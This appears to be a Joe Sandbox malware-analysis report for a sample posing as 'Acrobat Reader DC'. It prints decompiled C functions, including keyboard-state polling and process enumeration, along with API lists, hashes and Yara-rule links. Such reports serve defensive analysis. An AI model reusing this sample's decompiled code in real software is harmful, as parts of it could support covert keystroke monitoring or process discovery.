                                  • Opcode Fuzzy Hash: 23f20de2412018a08f4578d4e0f12eac70a18aacfa0f9406534bc12fd33cd3b0
                                  • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004447E0 Relevance: 16.6, APIs: 11, Instructions: 130keyboardCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004447E0(intOrPtr _a4, char* _a8) {
				intOrPtr _v99;
				intOrPtr _v100;
				intOrPtr _v169;
				intOrPtr _v242;
				intOrPtr _v243;
				intOrPtr _v244;
				char _v260;
				char* _t55;
				intOrPtr _t78;
				char* _t79;

				_t79 = _a8;
				_t78 = _a4;
				 *_t79 = 0;
				 *((short*)(_t79 + 4)) = 0;
				if( *((intOrPtr*)(_t78 + 0x20)) == 0) {
					if((0x00008000 & GetAsyncKeyState(0xa0)) != 0 || (0x00008000 & GetKeyState(0xa0)) != 0) {
						if( *((char*)(_t78 + 0x1a)) == 0) {
							 *_t79 = 1;
						}
					}
					if((0x00008000 & GetAsyncKeyState(0xa1)) != 0 || (0x00008000 & GetKeyState(0xa1)) != 0) {
						if( *((char*)(_t78 + 0x1b)) == 0) {
							 *((char*)(_t79 + 1)) = 1;
						}
					}
					if((0x00008000 & GetAsyncKeyState(0x11)) != 0 || (0x00008000 & GetKeyState(0x11)) != 0) {
						if( *((char*)(_t78 + 0x1c)) == 0) {
							 *((char*)(_t79 + 2)) = 1;
						}
					}
					if((0x00008000 & GetAsyncKeyState(0x12)) != 0 || (0x00008000 & GetKeyState(0x12)) != 0) {
						if( *((char*)(_t78 + 0x1d)) == 0) {
							 *((char*)(_t79 + 3)) = 1;
						}
					}
					if((0x00008000 & GetAsyncKeyState(0x5b)) != 0 || (0x00008000 & GetKeyState(0x5b)) != 0) {
						_t55 = _t79;
						if( *((char*)(_t78 + 0x1e)) == 0) {
							 *((char*)(_t79 + 4)) = 1;
							return _t55;
						}
						goto L39;
					} else {
						goto L18;
					}
				} else {
					if(GetKeyboardState( &_v260) == 0) {
						L18:
						return _t79;
					} else {
						if(_v100 == 0x80 || _v244 == 0x80) {
							if( *((char*)(_t78 + 0x1a)) == 0) {
								 *_t79 = 1;
							}
						}
						if(_v99 == 0x80 &&  *((char*)(_t78 + 0x1b)) == 0) {
							 *((char*)(_t79 + 1)) = 1;
						}
						if(_v243 == 0x80 &&  *((char*)(_t78 + 0x1c)) == 0) {
							 *((char*)(_t79 + 2)) = 1;
						}
						if(_v242 == 0x80 &&  *((char*)(_t78 + 0x1d)) == 0) {
							 *((char*)(_t79 + 3)) = 1;
						}
						if(_v169 != 0x80) {
							goto L18;
						} else {
							_t55 = _t79;
							if( *((char*)(_t78 + 0x1e)) != 0) {
								L39:
								return _t55;
							} else {
								 *((char*)(_t79 + 4)) = 1;
								return _t55;
							}
						}
					}
				}
			}













                                  0x004447ea
                                  0x004447ee
                                  0x004447f5
                                  0x004447fb
                                  0x00444801
                                  0x004448a3
                                  0x004448be
                                  0x004448c0
                                  0x004448c0
                                  0x004448be
                                  0x004448d2
                                  0x004448ed
                                  0x004448ef
                                  0x004448ef
                                  0x004448ed
                                  0x004448ff
                                  0x00444917
                                  0x00444919
                                  0x00444919
                                  0x00444917
                                  0x00444929
                                  0x00444941
                                  0x00444943
                                  0x00444943
                                  0x00444941
                                  0x00444954
                                  0x00444970
                                  0x00444972
                                  0x00444974
                                  0x00000000
                                  0x00444974
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00444807
                                  0x00444816
                                  0x00444884
                                  0x0044488a
                                  0x00444818
                                  0x0044481d
                                  0x0044482b
                                  0x0044482d
                                  0x0044482d
                                  0x0044482b
                                  0x00444833
                                  0x0044483b
                                  0x0044483b
                                  0x00444845
                                  0x0044484d
                                  0x0044484d
                                  0x00444857
                                  0x0044485f
                                  0x0044485f
                                  0x00444869
                                  0x00000000
                                  0x0044486b
                                  0x0044486f
                                  0x00444871
                                  0x0044497d
                                  0x0044497d
                                  0x00444878
                                  0x00444878
                                  0x00444880
                                  0x00444880
                                  0x00444871
                                  0x00444869
                                  0x00444816

                                  APIs
                                  • GetKeyboardState.USER32(?), ref: 0044480E
                                  • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                  • GetKeyState.USER32(000000A0), ref: 004448AA
                                  • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                  • GetKeyState.USER32(000000A1), ref: 004448D9
                                  • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                  • GetKeyState.USER32(00000011), ref: 00444903
                                  • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                  • GetKeyState.USER32(00000012), ref: 0044492D
                                  • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                  • GetKeyState.USER32(0000005B), ref: 00444958
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: State$Async$Keyboard
                                  • String ID:
                                  • API String ID: 541375521-0
                                  • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                  • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                  • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                  • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0043305F Relevance: 16.6, APIs: 11, Instructions: 122COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 97%
                                  			E0043305F(void* __edx, void* __edi, struct HINSTANCE__* _a4, int _a12, void* _a16) {
				char _v16;
				char _v28;
				struct HRSRC__* _t27;
				void* _t28;
				void* _t29;
				void* _t34;
				BYTE* _t36;
				int _t38;
				signed char* _t43;
				int _t49;
				struct HRSRC__* _t61;
				long _t63;
				WCHAR* _t65;
				struct HINSTANCE__* _t66;

				_t65 = _a12;
				E0041329B(__edx,  &_v16, L"%d", _t65);
				E0041329B( &_v28,  &_v28, L"%d", _a16);
				if(E004114AB(__edi,  &_v28,  &_v16) != 0) {
					L2:
					return 1;
				} else {
					_t66 = _a4;
					_t27 = FindResourceW(_t66, _t65, 0xe);
					if(_t27 != 0) {
						_t28 = LoadResource(_t66, _t27);
						if(_t28 == 0) {
							goto L2;
						} else {
							_push(__edi);
							_t29 = LockResource(_t28);
							_a4 = _t29;
							_a12 = 0;
							if(0 >=  *((intOrPtr*)(_t29 + 4))) {
								L15:
								return 0;
							} else {
								_t11 = _t29 + 6; // 0x6
								_t43 = _t11;
								while(1) {
									_t61 = FindResourceW(_t66, _t43[0xc] & 0x0000ffff, 3);
									if(_t61 == 0) {
										break;
									}
									_t34 = LoadResource(_t66, _t61);
									_a16 = _t34;
									if(_t34 == 0) {
										break;
									} else {
										_t63 = SizeofResource(_t66, _t61);
										_t36 = LockResource(_a16);
										_t49 =  *0x497530;
										if(( *_t43 & 0x000000ff) != _t49 || (_t43[1] & 0x000000ff) !=  *0x49752c || (_t43[6] & 0x0000ffff) !=  *0x497528) {
											_t38 = _a12 + 1;
											_t43 =  &(_t43[0xe]);
											_a12 = _t38;
											if(_t38 < ( *(_a4 + 4) & 0x0000ffff)) {
												continue;
											} else {
												return 0;
											}
										} else {
											 *0x497534 = CreateIconFromResourceEx(_t36, _t63, 1, 0x30000, _t49,  *0x49752c, 0);
											goto L15;
										}
									}
									goto L16;
								}
								return 1;
							}
						}
					} else {
						goto L2;
					}
				}
				L16:
			}

















                                  0x00433066
                                  0x00433073
                                  0x00433085
                                  0x0043309c
                                  0x004330af
                                  0x004330b8
                                  0x0043309e
                                  0x004330a1
                                  0x004330a5
                                  0x004330ad
                                  0x004330bd
                                  0x004330c5
                                  0x00000000
                                  0x004330c7
                                  0x004330c8
                                  0x004330ca
                                  0x004330d2
                                  0x004330d5
                                  0x004330e0
                                  0x00433197
                                  0x0043319f
                                  0x004330e6
                                  0x004330e6
                                  0x004330e6
                                  0x004330ef
                                  0x004330fd
                                  0x00433101
                                  0x00000000
                                  0x00000000
                                  0x00433105
                                  0x0043310b
                                  0x00433110
                                  0x00000000
                                  0x00433112
                                  0x0043311e
                                  0x00433120
                                  0x00433129
                                  0x00433131
                                  0x00433155
                                  0x00433156
                                  0x00433159
                                  0x0043315e
                                  0x00000000
                                  0x00433160
                                  0x00433168
                                  0x00433168
                                  0x00433179
                                  0x00433192
                                  0x00000000
                                  0x00433192
                                  0x00433131
                                  0x00000000
                                  0x00433110
                                  0x00433176
                                  0x00433176
                                  0x004330e0
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004330ad
                                  0x00000000

                                  APIs
                                  • __swprintf.LIBCMT ref: 00433073
                                  • __swprintf.LIBCMT ref: 00433085
                                  • __wcsicoll.LIBCMT ref: 00433092
                                  • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                  • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                  • LockResource.KERNEL32(00000000), ref: 004330CA
                                  • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                  • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                  • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                  • LockResource.KERNEL32(?), ref: 00433120
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                  • String ID:
                                  • API String ID: 1158019794-0
                                  • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                  • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                  • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                  • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004485CB Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 109windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004485CB(struct HWND__** _a4, signed int _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, int _a24) {
				struct tagMENUITEMINFOW _v52;
				signed int _t46;
				struct HMENU__* _t58;
				struct HMENU__* _t59;
				signed int _t61;
				intOrPtr _t63;
				intOrPtr _t65;
				intOrPtr _t72;
				struct HWND__** _t79;
				int _t80;
				struct HWND__* _t81;

				_t61 = _a8;
				_t80 = _a16;
				_t79 = _a4;
				_v52.cbSize = 0x30;
				E00412F40( &(_v52.fMask), 0, 0x2c);
				if(_t80 != 0xffffffff) {
					if(E00441AF5(0x4a8630, _t80,  &_a16,  &_a8) != 0) {
						_t72 =  *0x4a8690; // 0x0
						_t79 =  *( *(_t72 + _a16 * 4));
						_t46 = _a8;
						_t63 =  *0x4a86a4; // 0xa71980
						 *(_t61 + 8) =  *( *((intOrPtr*)( *((intOrPtr*)(_t63 + _t46 * 4)))) + 8);
						_t65 =  *0x4a86a4; // 0xa71980
						if( *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t65 + _t46 * 4)))) + 0x88)) == 0xc) {
							L9:
							if(IsMenu( *(_t61 + 8)) == 0) {
								goto L5;
							} else {
								goto L10;
							}
						} else {
							_v52.fMask = 4;
							if(GetMenuItemInfoW( *(_t61 + 8), _t80, 0,  &_v52) == 0) {
								goto L5;
							} else {
								 *(_t61 + 8) = _v52.hSubMenu;
								goto L9;
							}
						}
					} else {
						goto L5;
					}
				} else {
					_t58 = _t79[0x68];
					if(_t58 == 0) {
						_t59 = CreateMenu();
						_t79[0x68] = _t59;
						SetMenu( *_t79, _t59);
						_t58 = _t79[0x68];
						_t79[0x6a] = _t58;
					}
					 *(_t61 + 8) = _t58;
					L10:
					_t81 = CreatePopupMenu();
					if(_t81 == 0) {
						L5:
						return 0;
					} else {
						_v52.dwTypeData = _a20;
						_v52.wID = _a12;
						_v52.fMask = 0x16;
						_v52.fType = 0;
						_v52.hSubMenu = _t81;
						InsertMenuItemW( *(_t61 + 8), _a24, 1,  &_v52);
						DrawMenuBar( *_t79);
						_t79[0x6a] = _t81;
						return 1;
					}
				}
			}














                                  0x004485d2
                                  0x004485d6
                                  0x004485da
                                  0x004485e5
                                  0x004485ec
                                  0x004485f7
                                  0x00448642
                                  0x0044864f
                                  0x0044865b
                                  0x0044865d
                                  0x00448660
                                  0x0044866e
                                  0x00448671
                                  0x00448683
                                  0x004486a7
                                  0x004486b3
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00448685
                                  0x00448690
                                  0x0044869f
                                  0x00000000
                                  0x004486a1
                                  0x004486a4
                                  0x00000000
                                  0x004486a4
                                  0x0044869f
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004485f9
                                  0x004485f9
                                  0x00448601
                                  0x00448603
                                  0x0044860d
                                  0x00448613
                                  0x00448619
                                  0x0044861f
                                  0x0044861f
                                  0x00448625
                                  0x004486b5
                                  0x004486bb
                                  0x004486bf
                                  0x00448644
                                  0x0044864c
                                  0x004486c1
                                  0x004486cb
                                  0x004486d3
                                  0x004486db
                                  0x004486e2
                                  0x004486e9
                                  0x004486ec
                                  0x004486f5
                                  0x004486fb
                                  0x00448709
                                  0x00448709
                                  0x004486bf

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                  • String ID: 0
                                  • API String ID: 176399719-4108050209
                                  • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                  • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                  • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                  • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00433D9E Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 107COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 62%
                                  			E00433D9E(intOrPtr _a4, long* _a8, void* _a12) {
				unsigned int _v8;
				char _v12;
				intOrPtr _v16;
				char _v24;
				char _v540;
				char _v1064;
				char _v1580;
				char _v2096;
				char _v4144;
				void* __edi;
				unsigned int* _t36;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t49;
				long _t50;
				signed int _t54;
				intOrPtr _t62;
				unsigned int _t74;
				void* _t78;
				void* _t79;
				void* _t80;
				void* _t81;

				E00422240(0x102c);
				_t36 =  &_v8;
				__imp__EnumProcesses( &_v4144, 0x800, _t36);
				if(_t36 != 0) {
					_t4 =  &_a12; // 0x443d49
					_t74 = _v8 >> 2;
					 *((char*)( *_t4)) = 0;
					_t38 = E00433D5F( &_v4144, _a4);
					_t81 = _t80 + 4;
					_t54 = 0;
					_v16 = _t38;
					if(_t74 != 0) {
						while( *_a12 == 0) {
							_t78 = OpenProcess(0x410, 0,  *(_t79 + _t54 * 4 - 0x102c));
							__imp__EnumProcessModules(_t78,  &_v12, 4,  &_v8);
							_t42 = _v12;
							__imp__GetModuleBaseNameW(_t78, _t42,  &_v1064, 0x104);
							if(_t42 != 0) {
								E00413A0E( &_v1064,  &_v24,  &_v2096,  &_v540,  &_v1580);
								E00411536( &_v540,  &_v1580);
								_t49 = E004114AB(_t74,  &_v540, _a4);
								_t81 = _t81 + 0x24;
								if(_t49 != 0) {
									_t62 = _v16;
									if(_t62 != 0) {
										_t50 =  *(_t79 + _t54 * 4 - 0x102c);
										if(_t62 == _t50) {
											 *_a8 = _t50;
											goto L11;
										}
									}
								} else {
									 *_a8 =  *(_t79 + _t54 * 4 - 0x102c);
									L11:
									 *_a12 = 1;
								}
							}
							CloseHandle(_t78);
							_t54 = _t54 + 1;
							if(_t54 < _t74) {
								continue;
							}
							break;
						}
					}
					return 1;
				} else {
					return 0;
				}
			}

























                                  0x00433da6
                                  0x00433dab
                                  0x00433dbb
                                  0x00433dc3
                                  0x00433dce
                                  0x00433dd7
                                  0x00433dda
                                  0x00433ddd
                                  0x00433de2
                                  0x00433de5
                                  0x00433de7
                                  0x00433dec
                                  0x00433dfe
                                  0x00433e1f
                                  0x00433e2c
                                  0x00433e32
                                  0x00433e43
                                  0x00433e4b
                                  0x00433e6d
                                  0x00433e80
                                  0x00433e90
                                  0x00433e95
                                  0x00433e9a
                                  0x00433eaa
                                  0x00433eaf
                                  0x00433eb1
                                  0x00433eba
                                  0x00433ebf
                                  0x00000000
                                  0x00433ebf
                                  0x00433eba
                                  0x00433e9c
                                  0x00433ea6
                                  0x00433ec1
                                  0x00433ec4
                                  0x00433ec4
                                  0x00433e9a
                                  0x00433ec8
                                  0x00433ece
                                  0x00433ed1
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00433ed1
                                  0x00433ed7
                                  0x00433edf
                                  0x00433dc5
                                  0x00433dca
                                  0x00433dca

                                  APIs
                                  • EnumProcesses.PSAPI(?,00000800,?,?,00443D49,?,?,?,004A8178), ref: 00433DBB
                                  • OpenProcess.KERNEL32(00000410,00000000,?,?,?,004A8178), ref: 00433E19
                                  • EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 00433E2C
                                  • GetModuleBaseNameW.PSAPI(00000000,?,?,00000104), ref: 00433E43
                                  • __wsplitpath.LIBCMT ref: 00433E6D
                                  • _wcscat.LIBCMT ref: 00433E80
                                  • __wcsicoll.LIBCMT ref: 00433E90
                                  • CloseHandle.KERNEL32(00000000), ref: 00433EC8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: EnumProcess$BaseCloseHandleModuleModulesNameOpenProcesses__wcsicoll__wsplitpath_wcscat
                                  • String ID: I=D
                                  • API String ID: 2903788889-2605949546
                                  • Opcode ID: e2a61d30099513a4b86aa9445ff639564bac9cad2a304c62a227ff9d1443cd16
                                  • Instruction ID: 36098e5712afd53b5e3c4de91d69c0015cf2cbbc5c01d2287a97767e02e0faf1
                                  • Opcode Fuzzy Hash: e2a61d30099513a4b86aa9445ff639564bac9cad2a304c62a227ff9d1443cd16
                                  • Instruction Fuzzy Hash: 05319376600108AFDB11CFA4CD85EEF73B9AF8C701F10419AFA0987250DB75AB85CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00448D62 Relevance: 15.2, APIs: 10, Instructions: 174windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00448D62(void* __eflags, signed int _a4, signed char _a7, long _a8) {
				intOrPtr _v8;
				signed int _v12;
				long _t44;
				signed int _t45;
				signed char _t55;
				intOrPtr _t61;
				intOrPtr _t66;
				struct HWND__* _t70;
				struct HWND__** _t75;

				if(E00441AF5(0x4a8630, _a4,  &_a4,  &_v12) == 0) {
					L27:
					__eflags = 0;
					return 0;
				} else {
					_t61 =  *0x4a8690; // 0x0
					_t66 =  *0x4a86a4; // 0xa71980
					_v8 =  *((intOrPtr*)( *((intOrPtr*)(_t61 + _a4 * 4))));
					_t75 =  *( *(_t66 + _v12 * 4));
					_t55 = _t75[0x22];
					_t70 =  *_t75;
					_a7 = _t55;
					E00432B92( &_a8);
					_t44 = _t75[0x11];
					_t83 = _t44;
					if(_t44 >= 0) {
						E004413AA(_t83, _t44);
					}
					_t45 = _t55 & 0x000000ff;
					if(_t45 > 0x1b) {
						goto L27;
					} else {
						switch( *((intOrPtr*)(( *(_t45 + 0x448f86) & 0x000000ff) * 4 +  &M00448F62))) {
							case 0:
								__eax = _a8;
								__eflags = __eax;
								if(__eflags < 0) {
									goto L27;
								} else {
									__esi[0x11] = __eax;
									__eax = E00441432(__ecx, __eflags, __eax, 1);
									goto L23;
								}
								goto L28;
							case 1:
								L19:
								__esi[0x11] = __ebx;
								E00441432(__ecx, __eflags, __ebx, 1) = E00430B87(_v8, __esi, 1);
								goto L23;
							case 2:
								__eax = _a8;
								__eflags = __eax;
								if(__eax < 0) {
									goto L27;
								} else {
									__eax = SendMessageW(__edi, 0x2001, 0, __eax);
									goto L23;
								}
								goto L28;
							case 3:
								__eax = _a8;
								__eflags = __eax;
								if(__eax < 0) {
									goto L27;
								} else {
									__eax = SendMessageW(__edi, 0x111d, 0, __eax);
									goto L23;
								}
								goto L28;
							case 4:
								__eax = _a8;
								__eflags = __eax;
								if(__eflags < 0) {
									goto L27;
								} else {
									__esi[0x11] = __eax;
									__eax = E00441432(__ecx, __eflags, __eax, 1);
									__ecx = __esi[0xc];
									__eax = InvalidateRect(__esi[0xc], 0, 1);
									goto L23;
								}
								goto L28;
							case 5:
								__eax = _a8;
								__eflags = __eax - 0xffffffff;
								if(__eflags < 0) {
									goto L27;
								} else {
									__esi[0x11] = __eax;
									__eax = E00441432(__ecx, __eflags, __eax, 1);
									__eflags = __esi[0x22] & 0x00000020;
									if((__esi[0x22] & 0x00000020) == 0) {
										__eax =  *__esi;
										__edi = ShowWindow;
										__eax = ShowWindow( *__esi, 0);
										__ecx =  *__esi;
										ShowWindow( *__esi, 5) = SetFocus( *__esi);
									}
									goto L23;
								}
								goto L28;
							case 6:
								_t57 = _a8;
								if(_t57 == 0xfffffffe) {
									goto L27;
								} else {
									_t86 = _t57 - 0xfe000000;
									if(_t57 != 0xfe000000) {
										SendMessageW(_t70, 0x1001, 0, _t57);
										SendMessageW(_t70, 0x1026, 0, _t57);
										_t49 = E00430B87(_v8, _t75, 1);
									} else {
										_t75[0x11] = _t57;
										_t49 = E00441432(_t63, _t86, _t57, 1);
									}
									L23:
									if( *0x49751c == 0 || _a7 != 8) {
										return 1;
									} else {
										return _t49 | 0xffffffff;
									}
								}
								goto L28;
							case 7:
								__eflags = __ebx;
								if(__ebx < 0) {
									goto L27;
								} else {
									__eax = GetWindowLongW(__edi, 0xfffffff0);
									__eax = __eax | 0x0000000b;
									__eflags = __eax;
									__eax = SetWindowLongW(__edi, 0xfffffff0, __eax);
									goto L19;
								}
								goto L28;
							case 8:
								goto L27;
						}
					}
				}
				L28:
			}












                                  0x00448d83
                                  0x00448f54
                                  0x00448f56
                                  0x00448f5c
                                  0x00448d89
                                  0x00448d8c
                                  0x00448d9a
                                  0x00448da0
                                  0x00448da6
                                  0x00448da8
                                  0x00448dae
                                  0x00448db4
                                  0x00448db7
                                  0x00448dbc
                                  0x00448dc2
                                  0x00448dc4
                                  0x00448dc7
                                  0x00448dc7
                                  0x00448dcc
                                  0x00448dd2
                                  0x00000000
                                  0x00448dd8
                                  0x00448de2
                                  0x00000000
                                  0x00448e3c
                                  0x00448e3f
                                  0x00448e41
                                  0x00000000
                                  0x00448e47
                                  0x00448e4a
                                  0x00448e4d
                                  0x00000000
                                  0x00448e4d
                                  0x00000000
                                  0x00000000
                                  0x00448ed9
                                  0x00448edc
                                  0x00448eeb
                                  0x00000000
                                  0x00000000
                                  0x00448e57
                                  0x00448e5a
                                  0x00448e5c
                                  0x00000000
                                  0x00448e62
                                  0x00448e6b
                                  0x00000000
                                  0x00448e6b
                                  0x00000000
                                  0x00000000
                                  0x00448e76
                                  0x00448e79
                                  0x00448e7b
                                  0x00000000
                                  0x00448e81
                                  0x00448e8a
                                  0x00000000
                                  0x00448e8a
                                  0x00000000
                                  0x00000000
                                  0x00448e95
                                  0x00448e98
                                  0x00448e9a
                                  0x00000000
                                  0x00448ea0
                                  0x00448ea3
                                  0x00448ea6
                                  0x00448eab
                                  0x00448eb3
                                  0x00000000
                                  0x00448eb3
                                  0x00000000
                                  0x00000000
                                  0x00448ef2
                                  0x00448ef5
                                  0x00448ef8
                                  0x00000000
                                  0x00448efa
                                  0x00448efd
                                  0x00448f00
                                  0x00448f05
                                  0x00448f0c
                                  0x00448f0e
                                  0x00448f10
                                  0x00448f19
                                  0x00448f1b
                                  0x00448f25
                                  0x00448f25
                                  0x00000000
                                  0x00448f0c
                                  0x00000000
                                  0x00000000
                                  0x00448de9
                                  0x00448def
                                  0x00000000
                                  0x00448df5
                                  0x00448df5
                                  0x00448dfb
                                  0x00448e16
                                  0x00448e25
                                  0x00448e32
                                  0x00448dfd
                                  0x00448e00
                                  0x00448e03
                                  0x00448e03
                                  0x00448f2b
                                  0x00448f32
                                  0x00448f51
                                  0x00448f3a
                                  0x00448f43
                                  0x00448f43
                                  0x00448f32
                                  0x00000000
                                  0x00000000
                                  0x00448ebb
                                  0x00448ebd
                                  0x00000000
                                  0x00448ec3
                                  0x00448ec6
                                  0x00448ecc
                                  0x00448ecc
                                  0x00448ed3
                                  0x00000000
                                  0x00448ed3
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00448de2
                                  0x00448dd2
                                  0x00000000

                                  APIs
                                    • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                  • SendMessageW.USER32(76F1D360,00001001,00000000,?), ref: 00448E16
                                  • SendMessageW.USER32(76F1D360,00001026,00000000,?), ref: 00448E25
                                    • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
